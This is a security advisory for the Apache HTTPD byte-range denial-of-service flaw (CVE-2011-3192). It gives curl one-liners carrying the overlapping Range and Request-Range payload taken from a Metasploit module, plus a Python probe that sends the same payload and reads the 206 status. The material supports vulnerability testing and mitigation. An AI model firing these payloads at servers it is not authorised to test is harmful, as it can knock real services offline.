A denial of service vulnerability (CVE-2011-3192) has been found in the way multiple overlapping byte ranges are handled by the Apache HTTPD server prior to version 2.2.20:
http://seclists.org/fulldisclosure/2011/Aug/175
An attack tool is circulating in the wild, and active use of this tool has been observed.
In addition to the ‘Range’ header, the ‘Request-Range’ header is equally affected. Vendor updates have since been released, and the mitigating regexes have been improved (both for speed and to accommodate a different, new attack pattern).
Affected versions: all versions of Apache HTTPD prior to version 2.2.20.
curl http://<IP>/ -H "Host: <hostname>" -H "Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s
OR
curl http://<IP>/ -H "Host: <hostname>" -H "Request-Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s
Test fails (machine vulnerable): HTTP status 206, i.e. the server honoured the overlapping ranges.
Test passes (machine not vulnerable): any error, or any response status other than 206.
Note: the payload is a direct copy of the one used by the Metasploit (MSF) module.
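The same check as the curl one-liners, as an added example that is not part of the original advisory or of the MSF module: it builds the raw request with either affected header, reads back only the status line, and applies the 206 rule. It also counts the ranges in a header value so you can see why the payload trips a limit-the-number-of-ranges mitigation; the five-range threshold below is an assumption used for illustration, not a quote of any vendor's rule, and the target IP, Host value and port are parameters you supply.

```python
"""Probe for the Apache Range/Request-Range DoS (CVE-2011-3192) and show how a
range-count limit sees the payload. Added example, not the advisory's own code."""
import re
import socket

# Payload exactly as given in the advisory (copied from the MSF module):
# 11 ranges, the first reversed (5-0), the rest single bytes overlapping it.
MSF_PAYLOAD = "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"

# Both header spellings are affected; Request-Range is the legacy one.
AFFECTED_HEADERS = ("Range", "Request-Range")

# Assumed threshold for illustration: strip/refuse headers with more ranges.
MAX_RANGES = 5


def build_request(host, header_name, payload=MSF_PAYLOAD, path="/"):
    """Raw HTTP/1.1 request equivalent to the advisory's curl command."""
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"{header_name}: {payload}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def status_of(response):
    """Status code from raw response bytes, or None if there is no status line."""
    m = re.match(rb"HTTP/1\.[01] (\d{3})[ \r]", response)
    return int(m.group(1)) if m else None


def verdict(status):
    """Advisory rule: 206 means the ranges were honoured (vulnerable);
    200, 4xx, a malformed reply or no reply at all means not vulnerable."""
    return "vulnerable" if status == 206 else "not vulnerable"


def range_count(value):
    """Number of byte ranges in a Range or Request-Range header value."""
    spec = value.partition("=")[2] if "=" in value else value
    return len([r for r in spec.split(",") if r.strip()])


def would_be_stripped(value, limit=MAX_RANGES):
    """True if a limit-the-ranges mitigation (assumed limit) would drop it."""
    return range_count(value) > limit


def probe(ip, host, header_name="Range", port=80, timeout=10):
    """Send the payload over a plain socket; return (status, verdict).
    Reads only until the end of the headers so a vulnerable server's
    large multipart body is never pulled down."""
    buf = b""
    try:
        with socket.create_connection((ip, port), timeout=timeout) as s:
            s.sendall(build_request(host, header_name))
            while b"\r\n\r\n" not in buf:
                data = s.recv(4096)
                if not data:
                    break
                buf += data
    except OSError:
        return None, verdict(None)   # connection refused/reset counts as pass
    status = status_of(buf)
    return status, verdict(status)


if __name__ == "__main__":
    import sys
    target_ip, target_host = sys.argv[1], sys.argv[2]
    for hdr in AFFECTED_HEADERS:
        print(hdr, *probe(target_ip, target_host, hdr))
```

Run it as `python3 probe.py <IP> <hostname>` to test both headers in one go; a server whose reply starts `HTTP/1.1 206` on either is still exposed.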